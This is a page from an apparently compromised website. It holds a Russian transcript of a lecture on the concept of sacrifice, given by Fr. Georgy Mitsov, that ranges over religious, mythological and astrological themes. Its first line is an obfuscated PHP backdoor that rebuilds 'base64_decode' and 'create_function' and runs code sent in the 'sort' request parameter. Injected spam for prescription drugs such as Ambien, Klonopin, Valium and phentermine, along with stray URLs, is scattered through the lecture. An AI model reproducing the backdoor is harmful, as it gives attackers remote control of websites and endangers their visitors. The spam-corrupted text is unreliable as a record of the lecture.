nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ЖЕРТВА (Лекция, прочитанная о. Георгием Мицовым в начале 2000-х в Русском христианском гуманитарном институте)


К пониманию понятия «жертва»

Хочу донести до большинства суть этого понятия, потому что в нашей жизни оно пропало.  Слово жертва затерлось не меньше, чем слово любовь. На самом деле, жертва, как и религия, – это связь. На каком-то определенном уровне познания мира эта связь является отражением человека. Как он мыслит этот акт, так он и живет. Поэтому, чем выше поднять понятие жертвы, тем большего человек может достигнуть. Как сказано в Писании: «Кто в меру пророка – в меру пророка, кто  апостола…»  Здесь все зависит от осознания жертвы, потому что человек за свое время, за свою жизнь единственное, что может сделать, – это  только эту жизнь осознать. Вот как раз осознание жертвы, переход от одной жертвы к другой, и есть, может быть, вырастание человечества.

Очередность. Жизнь и смерть

http://persquaremile.com/2011/01/05/what-if-development-ran-rampant-in-silicon-valley/feed/ Какая возникает очередность?  Вот человечек, вот он завелся, вот он микроб, растеньице, рыбка, свинка, почка… В Коране – сгусток кровавый. Внутри он живет, как рыба в безвоздушном пространстве, но вот он рождается и что он делает сразу? Вдыхает. Набирает воздух. Набрал воздух и закричал. Именно этот момент берется за начало отсчета во всех астрологических системах. Человек заявляет о себе. До тех пор, пока он бессловесен, он еще ничто.

Вот он выдохнул криком, решил, что умирает, но остался жить. Нам незнакомо чувство смерти, потому что, казалось бы,  откуда мы знаем про смерть, если не умирали?  А тут, оказывается, уже она была. И второе, что ребенок начинает делать после того как начал дышать? Советская власть не давала сразу приложить ребенка к груди, но, на самом деле, первое, что он захочет делать – это сосать. Говорят, когда смотрят  материнское  чрево, то там маленький ребенок сосет пальцы, приготавливается к этому делу.

Жизнь. Отношение к другому

Cheap Ambien Врач, приходя к какому-нибудь пожилому больному, спрашивает: «Как аппетит больного? Ел он или не ел? Поэтому, можно сказать, что движение и питание отличает человека от косной, неживой природы. Так что движение и питание  можно представить как основные компоненты живого существа.

http://chelseafc360.com/robots.txt Дальше что возникает? Возникает осмысление. С какого времени человечек начинает что-то думать? Когда адаптируется в мире?

Buy Zopiclone 7.5Mg Online В нашей деревне у соседей была собака, мелкая и злая, звали ее Белкой. Моего младшенького она  все время кусала. Чтобы избежать укусов, он брал железную телегу, которая громыхала, и ему казалось, что это отпугнет зверя. С другой стороны, когда он подходил к этому дому, то начинал кричать: «Друг мой, Белка!». Эта Белка все равно его кусала. Но так как  кричал он «друг мой», то это был как раз дружеский жест, то же самое, что протянуть кому-то кусок еды или что-нибудь еще. Это был дружественный акт. И, вероятно, все это имеет значение.

Очередность. «Ты мне – я тебе»

Если посмотреть на площадку зверинца, то можно увидеть,  что зверьки  – один другого куснул, ударил, побежал, другой за ним, и так начинается такой пинг-понг. То же самое происходит на площадке детского сада. Когда детишки гуляют, то можно увидеть,  что там один другого толкнул и побежал от него, а другой с чувством праведного негодования бежит за ним и тоже толкает. Тогда тот, кого недавно толкали, имеет право побежать и толкнуть того, кто его толкнул. Хотя он его уже до этого толкал.

Buy Cheap Klonopin Такая очередность и право на эту очередность предполагает, нельзя сказать, что симметрию, но такие отношения, которые можно назвать «ты мне – я тебе».

Понятие одинаковости взаимобытия. Возникновение ритуала жертвы

Buy Valium Boots Раньше люди,  когда стояли в очереди (в очереди довоенной и послевоенной), если кто-нибудь приходил, не пускали его в очередь впереди себя, а, чтобы не обидеть остальных, вставали в конец очереди, отдав свое место тому, кого хотели пропустить вперед. Вот это понятие, опять же, не то чтобы  взаимозаменяемости, а одинакового взаимобытия, оно как  отражение собственных ощущений или понятий, которые проецируются на мир. И я думаю,  что именно  отсюда и возникает уже ритуал жертвы. Потому что иначе не понять, кому она приносится, если человек представляет мир невидимым.

Индийскому богу Агни пять раз в день приносится жертва на живом  огне. Любой огонь, любой костер является пастью Агни, через которую можно принести ему жертву. Помню, как мой приятель Наиль, который, являясь мусульманином, не ел мяса, потому что оно было неправильно зарезано, однажды взял курицу и со словами «Бисмилляхи Рахмани Рахим» начал резать ей горло. При этом он сказал мне: «Отойди, ты закрываешь Мекку!» И мне нужно было отойти, чтобы курица все же была повернута  в сторону Мекки.

Направленность жертвы

Большинство первых церквей были направлены в сторону Иерусалима. Потому что были какие-то главные места, главные точки, главные пункты. Потому что, каково направление, такова и направленность, такова цель.  А цель определяет и нас самих. Потому что то, к чему мы стремимся, это и есть мы. Может быть,  даже лучшая сторона нас. И вот получается, что это – план действий, направление жертвы.

Первый опыт сознания жертвы. Традиция

Buy Adipex 37.5 Diet Pills Наше материалистическое сознание предполагает не жертву, а взятку: я тебе даю, чтобы ты дал мне. На самом деле, жертва – она совсем другая. Потому что вход в лес, восхождение на какую-нибудь гору, камушек, положенный в кучку,  или  тряпочка, привязанная к дереву, это ведь не является выгодной жертвой. Это нельзя считать приношением. Это просто знак внимания, как в фильме «Древо  желаний» Тенгиза Абуладзе.

Знак внимания. Скачок от материального к духовному

http://12twenty.com/testimonial/ucla-univ-csm/ И дальше что получается? Если спросить о  жертве,  то всем приходит на ум пятидесятый псалом, там «жертва Богу дух сокрушен». Это за пятьсот лет! Не понимаю, каким образом псалмопевец в своем Тегилиме  дошел до этого понятия. Это для меня чудо.

Утрата и возвращение духовных понятий

Cheapest Price For Lorazepam Недавно проводился опрос, в рамках которого людей просили растолковать слово  «целомудрие», но никто не смог этого сделать. Горестно,  что определенные слова уходят из жизни. За ними пропадают целые понятия. Пропажа понятий – это как вымерший вид животных. Они уже никогда не вернутся. Это как блюдо, которое никогда нельзя приготовить. Как мертвый язык. Потому что за этим словом, за этим образом,  за этим понятием  уходит целый мир чувств и отношений. И поэтому происходит такое  оскудение языка. Можно прочитать книгу любого времени, но никогда ты не будешь знать, как  там пахло, как там ели, какие были отношения, что же было на самом деле. Вместо этого оказывается какой-то цифровой вариант. Поэтому супруга Матюшина,  Елена Гуро, мечтала, что будет воскресение  не только людей, не только животных, но и лая, и инея, и всего прочего, что было,  потому что все должно существовать.

Возникновение понятия жертвы. Откровение жертвы

Когда происходит любое откровение, то возникает громадная полнота чувств. Эта полнота чувств может как-то набираться количественным, точечным путем, а может, действительно, откровением. И вот, что происходит? Если мы спросим по поводу  слова жертва, что можно сказать? Чем человек жертвует чаще всего? Жизнью. Может жертвовать  здоровьем, может жертвовать сном. Но пожертвование деньгами –  это некоторая бредятина, потому что даже американцы говорят, что благотворительность  и налоги – это не жертва. Не «Курбан Байрам». Это совсем другое. И когда я понял, что жертва связана  лично только с тобой, лично с самим собой, то возникла вторая часть.

Я и другая жизнь. Мужчина и женщина

Чем ты можешь жертвовать реально? Почему «жена спасётся чадородием»? Потому что женщина жертвует собой, когда рождается ребенок.  Когда она рожает, ей кричат  «давай-давай, напрягайся, а то ребенок умрет!». И ей как бы приходится выбирать, кому умереть.  Она перешагивает через свою жизнь  для того, чтобы возникла другая. А мужчина? Чем он может пожертвовать? Ему нужно, наверное, отказаться от своего удовольствия, от своего благополучия, чтобы могла существовать другая жизнь.

Я и собственность

Есть такое слово «собь». Такое же потерянное слово, как «лепо-нелепо»… Собь. Отсюда и «особь», отсюда и «собственность», отсюда  и «сам с собой»,  или же отсюда может открыться присоединение самого себя. Человек вмещает в себя очень много. По мере того как будут увеличиваться его чувства, как будут увеличиваться знания, будет расширяться и его внешний мир, в котором ему будет не грустно. Это будет его собственность. Но,  между тем, эта «собь»  (которая  оказывается «она»)  может придавать значение тому, что происходит. Даже в масонстве: ковер, на котором происходило посвящение, имел одни и те же картинки. Между тем, толкование этих картинок было каждый раз разное. И уровень посвященного был ясен из того, как он растолковывал эти картинки.

Я и мир

Так же и здесь, насколько человек чувствует, насколько человек понимает, насколько он может связать концы с концами, настолько и мир будет существовать. Потому что все время должно происходить утверждение этого мира, который ты принял и создаешь. Это не только «лишь тот достоин жизни и свободы, кто каждый день идет за них на бой», но здесь происходит встреча, происходит утверждение того мира, который ты выбрал. Мира, в котором ты  живешь и который ты своей жизнью обслуживаешь.

Космический аспект. Органопроекция

Гуго Винклер  говорил, что человеческая цивилизация, вероятно,  начинается с созвездия Близнецов. Но не потому что «оттуда прилетели». Совсем недавно мы вошли в эру или эпоху Водолея. Если мы 360 разделим на 12 и умножим на 72, то получим один сектор, один знак этого дома, в котором находится Земля в период от одного весеннего равноденствия до другого.

Получается, что люди жили, понимая мир, как какую-то осознанную проекцию сверху. Понимая и весну, и март, как начало жизни, рождение.

Вот у нас будет что завтра? Завтра у нас будет как раз мистическое дело, – астрономическая весна. Солнце взойдет  в созвездии Водолея, вероятно, первый или второй раз.  А когда-то оно до этого всходило в созвездии Рыб, а до этого всходило в созвездии Овна, а до этого – в созвездии Тельца, а  до этого, вероятно, всходило в созвездии Близнецов.

Жертва другого. Начало жертвоприношения

Был такой Борис Поршнев, который еще в советское время писал совершенно фантастические книжки.  Он был полным сюрреалистом. И он говорил, что человечество было таким паршивым образованием, что оно не могло ни охотиться, ни собирать. Люди были в основном трупоеды.  Почти как джайны. Но среди них выделился какой-то класс людей, которые сами человечиной не питались. На  костях многих людей троглодического  периода  находят трасологические следы зубов людей, а не каких-то других зверей. Сами они, как жвачные животные,  убивать не могли, но подталкивали к этому определенный класс людей, тех, кто спокойно мог убить. Поэтому основная жертва, которая была вначале, конечно, это жертва человеческая.

Переход от человеческой жертвы к жертвоприношению животных

Потом, если вспомнить египетскую палетку  Нармера,  псалмы Давидовы,  сон Иосифа, все прочее, то там везде встречаются коровы и быки. Но активная жизнь там начинается уже с барашков. Авраам, чтобы принести Богу в жертву, по одним вариантам,  повел на гору Мориа своего первого  сына Исмаила, по другим – Исаака. Но тут в кустиках оказался барашек. И тогда был этот барашек  зарезан вместо человеческой жертвы. Уже ясно, что возникает созвездие Овна. Если дальше пойти, то мы увидим, что в Египте  после быка Аписа начинается Амон Ра. Этот Амон Ра с завернутыми рогами уже носит вещий характер. В первое весеннее полнолуние после весеннего равноденствия начинается Пейсах. Карусель. Выметают все квасное из дома и начинают печь мацу. Все двери, кроме порога, нужно было мазать кровью агнца, чей возраст не должен был превышать одного года. Потому что он оказывался гипонимом солнца, которое вставало в созвездии Овна.

Пасха. Переход к мощам

При этом ни одна из костей агнца не должна была быть сокрушена. Почему ему не ломали  костей? Здесь опять возникает интереснейшая штука.  Древние иудеи совершенно реально ожидали воскрешения мертвых  (позднее это было потеряно из-за саддукеев).  Они действительно мыли кости и складывали в гроб, ожидая воскрешения. Почти так же, как мальгаши, которые жили на Мадагаскаре и каждый год вынимали своих умерших предков, сажали за стол,  с ними вместе ели, потом переодевали и потом опять убирали.

Такая же традиция осталась в переоблачении мощей. Вот в Вильнюсе есть три мученика, так у них все время меняют тапочки. И эти тапочки оказываются уже освященными.

Кости – это непростая вещь. Потому что кость – это материальная сущность какого-то индивидуального бытия, так же как какие-нибудь электромагнитные линии оказываются сущностью какой-нибудь субстанции. Помните сказочку, где какой-то охотник выходит на край болота, а там черти лешего дерут. И вот он стреляет, черти убегают от страха, а леший, седой как лунь,  говорит охотнику: «Пойдем, я тебя награжу!» И  заводит его в свой дом.  А там у него гусь ходит по избе. Леший говорит: «Гусь! Встряхнись и на сковородку ложись!»  Гусь ложится на сковородку и запекается. Леший говорит охотнику: «Ты ни в коем случае ни одну косточку не грызи, не ешь!».  И, в конце концов, он опять скидывает кости в сумочку и говорит: «Гусь, встрепенись, отряхнись!» И гусь из этих костей появляется. Так же как у Иезекииля: кости должны обтянуться жилами, покрыться мышцами, кожей…

Возвращение к материальному

Так возможность сохранения человека, гуся, пасхального агнца  оказывается материальной твердыней.

В греческом варианте истории о потопе Девкалион и его жена Пирра, когда шли по опустошенной после потопа земле, слышат слова: «Кидайте за спину кости матери!»  И они догадываются, что «кости матери» это камни. Мать – это земля. Они кидают камни, из которых возникают разные сущности. Они опять заселят мир. Поэтому здесь субстанция  твердая.

Но на Севере твердое почему-то плохо приживается и поэтому, например, оленеводческие народы,  лопари и другие автохтоны, пускали по воде не хлеб, а шкуры оленей. Что было нужно – брали себе, а вот оленьи шкуры, чтобы, так сказать,  не валялись, пускали по рекам. Потому что в их представлении был такой хозяин мира, морской зверь, который съедал эти оболочки, наполнял их, и так опять появлялись стада оленей, появлялись стаи птиц и всё прочее. Почти так же, как богиня Нут, которая съедала и выпускала солнце, съедала и выпускала звезды…

Два  варианта круговращения в природе

Поэтому круговращение в природе оказывалось в двух вариантах:  либо оно  оказывалось циклическим, повторяющимся, либо оно находилось в ожидании какого-то воскрешения  или восстания, что также можно было воспринимать, как семена следующей жизни. Поэтому возникает как бы два отношения к миру: «циклическое» и «отрезочное». Где отрезок – это, например, «с утра до вечера», «от рождения до смерти», ну или какой-нибудь пик, какое-нибудь восхождение на зиккурат. Но, как  я уже говорил, мы ведь не знаем, как это было.  Поэтому только таким восхождением, расширением чувств и сознания мы можем оказаться вместе с тем, что было  и вместе с тем, что будет. А когда человек на своем точечном уровне предполагает замену себя…

Ну,  хорошо,  Исмаилу повезло, оказался барашек. Ангелы взяли этот жертвенник и перенесли его в Мекку. Он стал Каабой. Завет был заключен. Потом Давид захватывает гору Мория. Почему там строится храм Иерусалимский? Почему там находится мечеть «Купол скалы»?  Почему  возникает этот пик, на котором  крутится завязка борьбы двух сыновей Авраама?  Здесь спор будет вечным, потому что первенство у сына Агари, а свободное рождение у Исаака. Это невозможно решить. Кто первый, кто главный, – это спор навсегда.

Я остановился на барашке и на его костях, и почему их не надо ломать. На самом деле, это мои домыслы и этого нигде нету. В общем-то,  можно пользоваться, ссылаясь, так сказать,  на правах рукописи.

Гипоним. Часть как гипоним целого

После переселения евреев в Египет (вслед за Иосифом Прекрасным), после окончания времени гиксосов, когда опять традиция фараонов оказалась сильнее, начались притеснения.  Но плач дошел до Господа и тогда нужно было выводить народ из Египта. Как можно было победить Египет, когда ты находишься в состоянии  такого порабощения и угнетения? А просто нужно было убрать этот самый гипоним. Потому что даже сейчас (кто служил в армии, тот знает) на посту номер один стоит знамя части, и если его украдут или сдадут, то часть расформировывается. Но знамя части стоит не просто так. Где пост номер один, там же появляется и денежный ящик. Поэтому знамя подтверждается еще и этим фактором.

В основе вавилонского зиккурата,  который состоял из сырцовых кирпичей, каждый кирпич  нужно  было  прокатать   агатовым цилиндриком, где было посвящение и смысл  этого храма. И каждый кирпич был… Ну, можно сравнить с разбитой голограммой, когда каждая частица должна давать целое изображение. Как использование клонирования, когда каждая клеточка должна повторять целый организм.

Но в зиккурате или в храме при зиккурате обязательно должно было быть еще и то божество, которому все посвящено.  Когда город захватывался, то забирали это божество и снимали ворота. Таким образом, город оказывался  бессмысленным, как виноград без семечек, из которого ничего не получится, который оказался внутри пустым. Даже в недавние времена Новгород называли домом Святой Софии. Псков называли не только Плесков, он был домом Святой Троицы. Поэтому главный собор, главная сущность города оказывалась этим центральным образованием Order Phentermine Overseas .

Некоторые исторические аспекты жертвоприношения

То же самое произошло и с Одиссеем. Помните историю с конем («бойтесь данайцев, дары приносящих»)? Вы знаете,  что произошло между Афиной и Посейдоном на  Акрополе? Посейдон ударил трезубцем,  и  забил соленый источник,   Афина ударила копьем, и выросла маслина. Посейдон был посрамлен. Если вы вспомните Грецию, то там весь берег изрезан, суша входит в море, море входит в сушу. Поэтому как раз на Акрополе и возникло выяснение отношений: «чей козырь круче?».  Афина была покровителем Одиссея. Интересно, что только Пенелопа и Одиссей знали, что их кровать стояла на на пеньке срезанной маслины. И поэтому вполне возможно отождествление Афины с Пенелопой. Но врагом Афины остался Посейдон. Посейдону приносились в жертву кони. Это у нас пенистые волны называются барашками, а у греков они называются конями.  Афиняне воевали в основном в Трое, и конь был сделан  как жертва Посейдону перед морским походом. Так восприняли это троянцы. Он и был не чем иным, как жертвой Посейдону.

Сама Троя была чуть больше гектара, сто на сто метров. Десять лет они с этой Троей махались.  А почему? Потому что в Трое находился палладий, статуя  Афины. Таким образом, афиняне не могли ничего сделать, потому что были по отношению к ней, как одноименные отталкивающиеся заряды. Афиняне не могли победить Афину, которая была,  оказывается, сущностью Трои. И поэтому победа стала возможной, только когда Одиссей и Диомед похитили Афину из святилища.

И тогда  Эней  сажает себе на спину своего отца, Анхиза, который держит всех богов в руках. Потому что у самого Энея  руки в крови, а кровавыми руками, руками в чужой крови, а не в крови жертвы, принесенной этим богам,  нельзя дотрагиваться, иначе можно осквернить.

Кровь

Это происходит все время, потому что  кровь воспринимается как душа. И одна душа не может быть использована в «разных вариантах». И поэтому-то троянцы, которые потом стали латинянами (все читали, наверное, у Вергилия?), со временем стали не любить кого? Греков!  Так же как греков не любят французы, так же как греков не любят американцы. Да! Американцы не любят греков. В американских фильмах, если кто-нибудь из героев грек, то его запросто можно убить…

Переход к Богу

Дальше получается, что сущность оказывается Богом, но Бог очень редко может оказаться сущностью. Потому что, как потом было у имяславцев, имя Бога есть Бог, но Бог не есть имя.

Некоторые ассоциации

Так что барашек есть Амон Ра, но Амон Ра не есть барашек. Поэтому,  чтобы шарахнуть по Египту,  или по Ираку, или почему-нибудь еще, они выбирают полнолуние, равноденствие. Все начинается в Пейсах.

И вот что получается в результате? Оказывается, что у египтян кто главное? Солнышко, да? Ра! И даже пирамида есть не что иное, как проекция солнца сквозь тучи. Все равно сверху оказывается диск солнца.

Еще была пшеница. Но пшеница могла стать вкусным хлебом, только когда была закваска. Поэтому  артос это одно, опресноки – это совсем другое. И если взять Каббалу, то можно увидеть, что солнце занимает какое-то 19-е  или 20-е  место среди планет. У нас занимает 1-е  или 2-е. Таким образом, так как у нас есть два светила, одно светило должно было заменить другое. Солнце должно было быть, так можно сказать, побеждено Луной.

Но у Солнца какие могут быть еще другие гипонимы или аватары. Огонь, костер – это маленькое наше солнце,  вокруг которого сидим. А что, кроме огня, может быть таким же желтеньким? Золото. Это Параджанов очень хорошо показал в фильме «Сурамская крепость». Там как раз у него копченые керосиновые лампы (хотя их тогда не могло быть),  и рядом рассыпанное золото, –  чтобы показать, что здесь происходит эманация сущности.

Так происходит мистическое уничтожение Египта. Например, Рыбаков пишет, что иго – это  не что иное, как три копья, поставленные в виде футбольных ворот, где начало – восход смерти,  апогей смерти и окончание  смерти. Проводили под игом – и человек уже был ничем. Он уже находился под игом.

Кажется, князь Святослав был заперт печенегами на каком-то полуострове у реки, а так как его дружина была вместе с детьми и женами, то они понимали, что не победят. Но в то время было представление, что в каком ты чине умер,  в таком и будешь существовать в вечности. По Велесовой книге, у предков было три мира: Явь – это наш мир,  Правь – это верхний мир и Навь, навьи чары, навий мир, то же, что «inferno». Это был троичный мир. Ты мог существовать в будущем только в том виде, в каком ты отсюда ушел. Если ты ушел  рабом, ты будешь рабом.  Если ты ушел свободным, значит, ты  свободным и будешь. Поэтому так важно было у самураев, так важно было у викингов, конунгов  обязательно уйти с честью. И вот они целую ночь резали собак и петухов, потому что это были сопровождающие в загробную жизнь, как вой ветра и зарница, луна. Они резали жен и детей,  чтобы они умерли свободными. Так как  утром им самим предстояло умереть в бою.  В Историческом музее есть картинка, я мимо как-то проходил, увидел, и было непонятно, почему на ней трупы кругом какие-то, и петухов режут.

О сущности и её выражении

Мы говорим о сущности, а сущность может выражаться в разных образах.  Солнце могло быть в виде золота или в виде квасного хлеба. И его можно было уничтожить, заменив на «лунную» ипостась: муку и воду. Можно было запретить ходить или родиться в весеннее равноденствие барашку Амону. И поэтому, когда под горой Синай, куда Моисей ходил получать Завет, был сделан золотой телец, на самом деле, люди поклонялись не золоту, они поклонялись той хорошей жизни, которая была в тот отрезок, когда солнце вставало в созвездии Тельца. Когда они жили хорошо.

О победе над врагом

Говорят, что если не можешь победить врага, то надо сделать его другом. Но если его можно победить мистически, то это тоже победа.

О том, кто должен победить

Если помните, алхимические и астрологические  знаки солнца и луны в полнолуние совпадают, золото и серебро оказываются одинаковыми.  Знаки похожи на икринку, только у солнца в икринке оказывается что-то черненькое, словно какой-то зародыш. А в  луне – нет. Но луна равноценная, поэтому она должна победить.

Как  прекрасно написал шлиссельбургский узник Морозов, который потом стал почетным академиком: «Христианство это есть не что иное, как  победа солнечного календаря над лунным». И это очень похоже  на правду. Почему страны,  в которых луна оказывается главной в календаре, пишут справа налево? Ну, это естественное движение.  Но вот, например, в вальдорфских школах следят за детьми, и если ребенок слишком экстраверт, то его заставляют собирать тетрадки, а если он интроверт, то раздавать. Это делается для того, чтобы ребенок учился через движения или действия.

Об обучении через движение

Почему и храм иерусалимский, и скиния были повернуты на запад? Храм иерусалимский был повернут на запад потому, что не было еще нормальных астрономов, и, чтобы начинать отсчет, нужно было увидеть молодой месяц. Почему два дня давалось на это, чтобы увидеть молодой месяц? Потому что в первый день он еще не виден, на второй день он появляется, это новомесячие, а с новомесячия можно было уже считать шаббат. Поэтому получалось, что  пол-луны с месяца – это проходила неделя, можно было праздновать субботу, полнолуние – еще неделя, пол луны – еще неделя,  исчезновение. Поэтому новомесячие и суббота были самым обычным делом. А луна, если за ней наблюдать, сначала начинает всходить на западе, потом постепенно переходит на  восток, начинает всходить на востоке, потом ее вообще не видно, она только днем поднимается. И если идти за луной, оказывается, что двигаешься против часовой стрелки.  Справа налево. Это объяснения я тоже нигде еще не встречал. Думаю, что в этом есть правда, потому что именно в странах,  в которых луна оказывается главным календарным измерением, движение при письме – справа налево. Так же, кстати, и у китайцев.

Связь с космосом

Становится понятно, почему направлением был запад, а не восток. Поэтому луна является главной не только в отсчете времен, но и вообще она является антитезой солнцу. Если посмотреть дальше, когда солнце стало входить в созвездие Рыб, то появился Ихтис,  Iesous Christos, Theou Yios, Soter . Рыба появилась наверху, Христос появился на Земле.

Рыба. Символика. Ориентация по небу

У Ольги Михайловной Фрейденберг, которую я считаю самой умной  женщиной  в мире, есть меткое замечание, что многие мистические понятия  со временем стали просто блюдами, то есть, тем, что едят люди. Ритуальными блюдами. И если вспомнить рыбу фиш,  для приготовления которой  нужно с щуки, которая всех жрет, аккуратно снять кожу и набить остальной мелочью,  то в итоге получается, что всю эту рыбу ест человек.

Таким образом, это уже не агнец, которого становится не актуально закладывать, а рыба. И очень смешно, что самое любимое блюдо в монастыре Иова Почаевского в Почаевской пустыни, в этих украинских краях, – это тоже фаршированная щука. Ну, люди не всегда понимают, что они делают…

Теперь мы вошли в созвездие Водолея… Намедни…

Если бы был такой курс – археология понятий или озвучивание археологии!

Жертвоприношение

Дальше что получается? Получается жертвоприношение. Это жертвоприношение оказывается общественным или частным. Частное жертвоприношение нам известно лучше всего. Нужно было за грехи приносить барашка или козленка, отдавать десятину, а после этого жить спокойно. Заплатил налоги и живи спокойно, да? Но при этом не происходило нравственного совершенствования! Человек окукливался и оставался на одном месте. Как какие-нибудь староверы, как какие-нибудь динозавры, или кто-нибудь еще… Он не рос, потому что не решал проблем, которые на него надвигались. Он жил спокойно. И это плохо.

Если не я, то кто

Суть не в козленке, суть не в барашке и не в том, как ты в эту жертву вкладываешься, а в вопросе, спрятался ты или нет. Произвел ты этот самый «чейндж» или нет. Потому что «вместо», «на место меня».  «Вот пуля пролетела и ага, товарищ мой упал…» Ага. Не меня. У соседа сдохла корова? Слава Богу, что не у меня. И вот это состояние, когда  «не  я, а кто-то» – это  есть одно из самых  эгоистических и предательских  дел,  которые  существуют в мире.

Это получается инстинктивно:  не меня задавило, не я упал, не со мной это случилось. Но тут же нужно брать себя за шкирку и говорить: «Ты  не прав!» Потому что именно создание такой ситуации замены и породило весь этот гнетущий ужас.

Выбор пути

Однажды я крестил японку, которая была из самурайского рода.  Я ей показал на Распятие и сказал, что это самый главный самурай. Она сразу все поняла, потому что, если у самурая есть выбор, то он идет в сторону смерти.

В тридцать три года самый хороший, самый красивый, самый добрый в городе, где собралось до 150-ти тысяч человек (хотя на тот Пейсах там жило не больше пяти), вышел сам,  в темноте, навстречу…  Он должен был показать, что жизнь –  это не главное и сделать шаг в вечность. Поэтому, ну, что говорить, что Он – заложник-не заложник,  жертва-не жертва, Искупитель-не Искупитель…  Для меня тут только может быть громадность любви. Не в тех  словах,  что «не ведают что творят», когда к кресту  приколачивали, а в том, что восемьдесят  миллиардов жили до нас. Я могу от силы  четверых-пятерых человек любить, за них помереть, но не за восемьдесят миллиардов? Здесь этот размер, вот именно этот океан любви Божьей, который очень тяжело представить и ощутить. Океан, конечно, представляли. И Ньютон, который ходил по краю, бросая камешки, как маленький ребенок, и Августин, который ее как ложкой черпал…  Выход навстречу смерти. Но смерть тут не просто как отрезок, смерть не только как Колесо Сансары, а смерть как необходимость рождения в вечность. Ну,  а если «за себя», значит, ты пытаешься остаться навсегда таким, каким ты был.

Общественное принесение жертвы

А как же происходит общественное принесение жертвы? Помните, как в Риме приносят в жертву быка? Его долго отбирают, не меньше, чем «красную телицу». И этот бык должен идти сам, он должен опустить голову. Если кто-то при чтении молитвы сбился, то нужно все начинать сначала. Потом быка бьют топором по голове, и начинается суд. Начинается суд над тем, кто это сделал. Человек говорит, что это не он, а топор. Топор кидают из рук в руки до тех пор,  пока, наконец, он не попадает в Тибр. Концы в воду. И нет никакой вины перед быком, который был убит.

С момента появления Митры на этом самом главном холме, где теперь собор святого Петра, появляется такое место, где под решетками  собираются определенные люди. Когда наверху режут быков, люди стоят внизу и омываются кровью, как под душем. Вспомните Зигфрида, который умывался кровью дракона.

В европейских религиозных песнопениях сохранилось такое выражение: «Пусть кровь агнца очистит меня, как снег». Тем же самым является Агнец, который предполагается как Христос. Это та же форма очищения людей, которые омывались кровью на этих тавроболиях. Так что это можно назвать «за меня».

То же самое происходит в Йом Кипур (судный день), когда мужчина крутит над головой петуха, а женщина – курицу (этот сюжет часто встречается на картинах Шагала), и они говорят, что это они отдают за себя, за этот год.  До этого десять дней покаяния и обдумывания, а потом можно начинать осенний, так сказать, новый год. Не этот, авива-нисана, а осенний новый год. И что получается? Получается, что «за меня»,  «за кого-то». И так формируется эгоистическое понятие.

У Клиффорда Саймака есть роман «Кольцо вокруг  солнца», где  герой медитирует  на юлу (помните, что есть центробежное движение и есть центростремительное?). И вот однажды он концентрируется на этой юле и переходит в другое пространство, которое является тем же самым параллельным миром. И где-то там он, что-то припоминая, добирается до дома на холме, где в саду цветут яблони, и слышит разговор, из которого узнает, что он не является той сущностью и личностью,  которой он себя считал, а что он всего лишь клон, слепок с того хорошего  человека, которого репродуцируют другие миры. Ему предстоит уйти, но он уже не переживает собственную кончину, потому что  знает,  что он является частью этого замысла.

Всё это было в разные времена у разных народов. Я уж не говорю про ацтеков, про их понимание солнца, вырванные сердца и каннибализм. Намного важнее понять, как формировалось наше сознание.

Формирование нашего сознания и переход в вечность

Это намного важнее, потому что главный переход, который мы все должны сделать, раз мы родились, – это рождение в вечность. Не смерть в этой жизни, а рождение в вечность. Если здесь мы родились при помощи мамы, щипцов или кесарева сечения, то «туда» мы рождаемся в мир,  который мы не только ощущаем,  не только предполагаем, но который мы строим сами. Вот у японцев есть страна Хёрай, куда попадают самураи. Это голубая страна, где каждая частица состоит из голубого света. Каждый, кто сделал себе сэппуку, тоже становится частицей голубого света. Для того чтобы появился какой-то мир, требуется его утверждение.

Утверждение нового мира

У Глеба Панфилова есть хороший фильм «В огне брода нет», где  Евгений Лебедев, который играет белого полковника,  спрашивает у героини Чуриковой: «Ты кем собираешься в новой жизни быть?»  Она говорит: «Художником!». Тот показывает на икону и спрашивает: «А ты можешь за свою веру пострадать?»  Она так оглядывается, смотрит на него и отвечает: «Нет, не могу…». Тот говорит: «Иди!» И отпускает ее. А Глузского, который играет комиссара, топчут и расстреливают. И вот она выходит во двор и начинает метаться, как курица.  Она понимает, что не только предатель, но и вообще, так сказать, никто и звать её никак. Она подбирает где-то камень, возвращается в дом, а там Лебедев какой-то порошок выпивает, в щель дверей видно. И она говорит:  «Сдавайся, гад!»  Он,  не глядя, в нее стреляет, она корчится и падает…

Возможность замены и выхода навстречу

Я хочу этим сказать, что есть возможность «подставы», замены, а есть возможность выхода навстречу. И это, конечно, является нервом. Этот шаг вперед, пожалуй, и есть самое главное.

Если вспомнить пелевинского Амона Ра, то зачем там космонавтам ступни отрезали? Оказывается, у того козырь круче, у кого больше жертва принесена. Не зря делались  гекатомбы, жертвы тысяч. Не зря Соломон, когда построил храм, принес в жертву больше ста тысяч волов и овец. Представьте, сколько должно было гореть, какой это был «крематорий»!

Символика. Утверждение сущности

Если рассмотреть египетскую пирамиду, то в её центре, словно семечка, оказывается фараон. Фараон обвит бинтами Книги мертвых, где написано, как ориентироваться в следующем мире, как попасть на ладью Ра. То же самое было у орфиков. Там в рот вставляли золотые пластинки, на которых указывалось, как идти к источнику Мнемозины, припасть к источнику забвения. Но что было после обвития фараона бинтами? Золотой саркофаг, потом деревянный, потом каменный, потом была сама пирамида. Это словно матрешка. То же самое происходит, когда человек приходит в храм и, если делает усилие, то видит в алтаре Сион,  стоящий домик. Если открыть этот домик, там будет не что иное,  как маленькая дароносица, если открыть дароносицу, то в ней будет маленький ящичек. Если открыть этот маленький ящичек, то там будут просто сухарики, которые были освящены в страстной четверг. Таким образом, сущностью оказывается хлеб. Хлеб, который дал человеку возможность жить безбедно.

Историческое отступление

Но до земледелия была охота. Любопытно, что североамериканские индейцы считали голод положительным чувством, потому что он толкал их на охоту, охота давала пищу, а пища кормила стойбище. Они не как в ектенье: «от глада, труса, огня, меча, нашествия иноплеменных…». У них голод был побудительным средством.

Основные способы захоронений в археологии – это трупозахоронение и трупосожжение. Трупозахоронение – это отношение к костям, как к семенам. А трупосожжение – это   возвращение к морскому царю, возвращение огню. И так мы переходим из феноменального мира в ноуменальный.

